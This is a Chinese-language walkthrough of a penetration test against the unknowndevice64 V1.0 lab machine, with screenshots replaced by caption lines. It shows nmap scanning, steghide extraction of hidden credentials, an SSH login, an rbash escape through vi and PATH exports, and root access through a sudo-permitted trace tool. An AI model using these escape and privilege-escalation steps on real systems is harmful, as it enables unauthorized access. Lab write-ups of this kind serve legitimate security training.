unknowndevice64-V1.0靶机渗透测试-摩杜云开发者社区

1.查看靶机IP地址

arp-scan -l
nmap -sP+攻击机ip地址

unknowndevice64-V1.0靶机渗透测试_d3

2.查看靶机开放端口

nmap -sS -Pn -A -p- -n 靶机ip

unknowndevice64-V1.0靶机渗透测试_d3_02

发现靶机开放1337-ssh端口服务，31337-http端口服务；

3.根据端口服务进行渗透（31337-http端口服务）

unknowndevice64-V1.0靶机渗透测试_d3_03

查看网页源代码

unknowndevice64-V1.0靶机渗透测试_环境变量_04

unknowndevice64-V1.0靶机渗透测试_bash_05

把图片下载到本地

猜测是ctf的隐写漏洞

Kali Steghide开源隐写工具

http://blog.csdn.net/weixin_46700042/article/details/108565769

用steghide进行提取其中的文本信息：

steghide extract -sf key_is_h1dd3n.jpg

提示需要密码，图片名称为 key_is_h1dd3n，那么密码就是 h1dd3n，成功提取出了h1dd3n.txt；

unknowndevice64-V1.0靶机渗透测试_环境变量_06

打开之后的文件信息为一种brainfuck的程序语言，使用在线工具https://copy.sh/brainfuck/，或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码；

unknowndevice64-V1.0靶机渗透测试_d3_07

4.登陆ssh（1337-ssh端口服务）

ssh ud64@192.168.110.197 -p 1337

unknowndevice64-V1.0靶机渗透测试_d3_08

unknowndevice64-V1.0靶机渗透测试_环境变量_09

尝试各种命令都被限制，竟然是rbash的shell

5.绕过rbash提权

在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量，将/bin/bash导出到shell环境变量，将/usr/bin目录导出到PATH环境变量：
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

unknowndevice64-V1.0靶机渗透测试_环境变量_10

使用sudo-l查看sudo权限，发现可以无密码登录sysud64

unknowndevice64-V1.0靶机渗透测试_bash_11

使用sudo sysud64 -h查看帮助消息，发现可以使用

-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

sudo sysud64 -o /dev/null /bin/sh

unknowndevice64-V1.0靶机渗透测试_bash_12